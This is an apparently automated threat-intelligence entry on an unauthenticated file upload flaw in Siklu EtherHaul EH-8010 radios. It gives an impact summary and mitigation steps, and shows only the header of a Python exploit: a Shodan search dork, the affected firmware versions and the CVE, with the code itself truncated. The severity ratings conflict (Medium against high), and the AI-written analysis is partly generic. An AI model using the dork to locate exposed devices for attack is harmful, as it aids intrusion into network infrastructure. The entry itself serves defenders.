
Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

Severity: Medium
Tags: Exploit, web, exploit
Published: Sat Jan 17 2026 (01/17/2026, 00:00:00 UTC)
Source: Exploit-DB RSS Feed

Description

Siklu EtherHaul Series EH-8010 devices are vulnerable to arbitrary file upload, which allows attackers to upload malicious files to the device. This vulnerability can lead to unauthorized code execution or system compromise. The exploit code is publicly available and written in Python, increasing the risk of exploitation. No specific affected versions or patches have been disclosed yet. The vulnerability primarily targets the web interface of the device. Although no exploitation in the wild has been reported, the presence of exploit code indicates a potential threat. European organizations using Siklu EtherHaul EH-8010 devices, especially in critical infrastructure or telecommunications, could be impacted. Mitigation requires monitoring for updates from the vendor and restricting access to device management interfaces. The threat severity is assessed as high because of the potential for unauthorized access and control, with no authentication requirements disclosed.

AI-Powered Analysis

Last updated: 01/18/2026, 07:47:49 UTC

Technical Analysis

The Siklu EtherHaul Series EH-8010 devices have been identified as vulnerable to an arbitrary file upload vulnerability. This type of vulnerability allows an attacker to upload files of their choosing to the device, potentially enabling remote code execution or persistent compromise. The vulnerability resides in the web interface of the device, which is typically used for management and configuration. Although the specific affected firmware versions have not been disclosed, the exploit code has been published on Exploit-DB (EDB ID 52467) and is implemented in Python, facilitating exploitation by attackers with moderate technical skills. The arbitrary file upload can allow attackers to bypass authentication or input validation mechanisms, upload malicious scripts or binaries, and execute them on the device. This can lead to full device compromise, interception or manipulation of network traffic, or use of the device as a pivot point for further attacks. No patches or vendor advisories have been linked yet, indicating that the vulnerability may be unpatched or undisclosed publicly. The exploit does not require user interaction, and the ease of exploitation is increased by the availability of public exploit code. The vulnerability affects the confidentiality, integrity, and availability of the device and potentially the network it supports. Given the device's role in wireless backhaul communications, exploitation could disrupt critical network infrastructure.

Potential Impact

For European organizations, especially those in telecommunications, critical infrastructure, or enterprises relying on Siklu EtherHaul EH-8010 devices for wireless backhaul, this vulnerability poses a significant risk. Exploitation could lead to unauthorized access to network management interfaces, allowing attackers to manipulate traffic, intercept sensitive data, or disrupt network availability. This could impact service providers, government agencies, and enterprises dependent on reliable wireless communication links. The compromise of such devices could also facilitate lateral movement within networks, increasing the risk of broader network breaches. Disruption or interception of communications could have regulatory and compliance implications under GDPR and other European data protection laws. The lack of patches, combined with the availability of public exploit code, increases the urgency for European organizations to assess exposure and implement mitigations.

Mitigation Recommendations

1. Immediately restrict access to the management web interface of Siklu EtherHaul EH-8010 devices to trusted networks and IP addresses using network segmentation and firewall rules.
2. Implement strong authentication and access controls on device management interfaces, including multi-factor authentication if supported.
3. Monitor vendor communications and security advisories for patches or firmware updates addressing this vulnerability and apply them promptly.
4. Conduct regular vulnerability assessments and penetration testing focused on network infrastructure devices to detect exploitation attempts.
5. Use network intrusion detection systems (NIDS) to monitor for suspicious file upload attempts or unusual traffic patterns targeting these devices.
6. If possible, disable or limit file upload functionality on the device’s web interface until a patch is available.
7. Maintain an inventory of all Siklu EtherHaul devices in use and prioritize remediation based on criticality and exposure.
8. Educate network and security teams about the vulnerability and the availability of exploit code to increase vigilance.


Technical Details

EDB ID: 52467
Has exploit code: true
Code language: python

Exploit Source Code

Exploit code for Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/

#!/usr/bin/
... (4411 more characters)
Code Length: 4,911 characters

Threat ID: 696c9008d302b072d9ad2ab6

Added to database: 1/18/2026, 7:47:20 AM

Last enriched: 1/18/2026, 7:47:49 AM

Last updated: 1/18/2026, 2:31:22 PM
